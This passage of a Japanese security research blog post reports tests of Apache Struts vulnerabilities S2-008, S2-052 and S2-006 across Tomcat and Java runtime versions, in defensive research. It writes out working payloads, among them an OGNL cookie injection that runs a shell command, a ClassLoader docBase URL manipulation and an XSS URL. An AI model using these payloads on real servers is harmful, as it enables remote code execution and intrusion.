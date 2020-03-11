ペイロード /showcase.action?Class.ClassLoader.resources.dirContext.docBase=%2Ftmp

ペイロードを考えると、環境によってこれが問題になるとは考えられませんでした。しかし、最終的に、サーブレットに渡される前にデータが何らかの理由でサニタイズされたことが明らかになったのです。さらに興味深いことに、Tomcatで生成されたアクセスログをチェックすると、アクセス先のURLが想定とは異なっていました。

Tomcat 8のアクセスログ “GET /j8-2.3.16.1/showcase.action HTTP/1.1” 404 989

Tomcat 6.5に切り替え、エクスプロイトを再度実行しました。ペイロードは正常に機能しました。そのうえ、Tomcat 6.5のアクセスログもTomcat 8とはまったく異なっていました。

Tomcat 6.5のアクセスログ “GET /j8-2.3.16.1/showcase.action?Class.ClassLoader.resources.dirContext.docBase=%2Ftmp HTTP/1.0” 200 12502

これは、古いソフトウェアをアップグレードし、これにインフラストラクチャを合わせることで脆弱性を低減できる方向に近づくことを示す好例です。裏読みすると、新しいインフラストラクチャほど平均的なインストールが実行される可能性が高くなるため、他の製品に存在する、このようなエクスプロイトが検出されなかったのかもしれません。

S2-008

この脆弱性では、ExceptionDelegatorに対してOGNL評価を引き起こします。OGNL式はチューリング完全であり、Javaのベースクラスに頻繁にアクセスします。攻撃者はさらにこれを利用してホストアプリケーションのコンテキストおよび機能内でコードを実行し、リモートコード実行（RCE）を引き起こします。

この脆弱性によって、ペイロードはcookieヘッダを通過しました。この脆弱性について興味深いのは、Apache Strutsを内包していること自体がセキュリティホールとなり、blank.warアプリケーションでさえ攻撃の対象となった点です。我々のサンプルペイロードでは、OGNLを使用してシェルコマンドを起動し、ファイルにアクセスするだけに決めました。

HTTPペイロードのやり取り GET /blank_j8-2.3.1/example/HelloWorld.action HTTP/1.1 Host: localhost User-Agent: Synopsys-CyRC/2019 Cookie: (#_memberAccess[“allowStaticMethodAccess”]\u003dnew\u0020java.lang.Boolean(true))(x)=1; x[@java.lang.Runtime@getRuntime().exec(“touch@/tmp/RCE”.split(“@”))]=1 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=52154AE434607CD570E5280CBD321A19; Path=/blank_j8-2.3.1 Content-Type: text/html;charset=UTF-8 Content-Length: 534

以上のペイロードはうまくいき、Tomcat 6で/tmp/RCEが生成されました。しかし、Tomcat 8にこれと同じペイロードを試行すると、cookie入力が即座にサニタイズされ、ステータスログに以下の不愉快な現象が現れました。

Tomcat 8のステータス・ログ – 試行失敗 org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie header was received [(#_memberAccess[“allowStaticMethodAccess”]\u003dnew\u0020java.lang.Boolean(true))(x)=1; x[@java.lang.Runtime@getRuntime().exec(“touch@/tmp/CVE-2012-0392/2.3.1”.split(“@”))]=1] that contained an invalid cookie. That cookie will be ignored.Note: further occurrences of this error will be logged at DEBUG level.

前述したように、古いバージョンのソフトウェアをアップグレードし、インフラストラクチャをこれに合わせると、脆弱性の低減に有効かもしれないことがこのログでも明らかです。

Javaランタイム環境

S2-052

この脆弱性は、Struts RESTプラグインをXStreamハンドラとともに使用してXMLを解析する際にRCE攻撃を引き起こします。

このRCE攻撃が機能するかどうかを検証することにしました。脆弱性を再現することができました。この脆弱性は、公知のペイロードの適合バージョンを使うと型変換例外が発生します。

Java Runtime Environment 8の脆弱性例外 com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service

Java Runtime Environment 11およびその他に対してこれらと同じエクスプロイトを試行した結果、このペイロードが機能しなかったことが分かりました。これは一つには、ランタイムディストリビューションに追加された変更によるものであり、その結果、com.thoughtworks.xstream.mapper.CannotResolveClassExceptionが発生しました。

しかし、ペイロードに修正を加えると、Java Runtime Environment 11で機能するようになりました。脆弱性は一見低減しているが、修正の追加によってエクスプロイトが作り出される可能性があることは経験上分かっています。この場合、脆弱性のあるコンポーネント周囲の環境をアップグレードするだけでは脆弱性を低減することはできませんでした。

エクスプロイトに関する次の投稿では、エクスプロイトとこれに似たシナリオの修正が必要な理由について深く掘り下げます。

検証

S2-006

このプロジェクトのお陰で、S2-006がクロスサイト・スクリプティング（XSS）の脆弱性と表現されていることがエラーページで明らかになりました。

S2-006が公開された際、その基本情報はあまり意味がありませんでした。

S2-006脆弱性の概要 <s:url>および<s:a>タグに対するクロスサイト・スクリプティング（XSS）の脆弱性 <s:url>タグと<s:a>タグのいずれも、このタグで生成されるURLが構築およびレンダリングされる際、適切にエスケープされないパラメータ値を挿入する可能性があります。既知のシナリオは次のとおりです。 <s:a>の結果の構造に含まれているパラメータ値は未エスケープの二重引用符を挿入することができるため、レンダリングされたhref属性をエスケープ処理することによって、生成されるHTML内にコードを埋め込むことができる。

<s:url>タグと<s:a>タグはいずれも、includeParamsが”none”以外の値に設定されたときに<script>タグをエスケープ処理できないため、含む側のJSP/actionをGETパラメータとともに呼び出すことで（例：http://localhost/foo/bar.action? <script>alert(1)</script>test=hello）攻撃を受けやすくなる。

さざまな試行錯誤を繰り返した結果、開発モードでStrutsが実行されると、これらの脆弱性のあるタグがエラーページにより生成されたことが最終的に明らかになりました。開発モードでは、Apache Strutsは独自のエラーページを生成します。それ以外の場合、Apache Tomcatはエラーページを生成し、このページは以上のような問題に対する脆弱性はありません。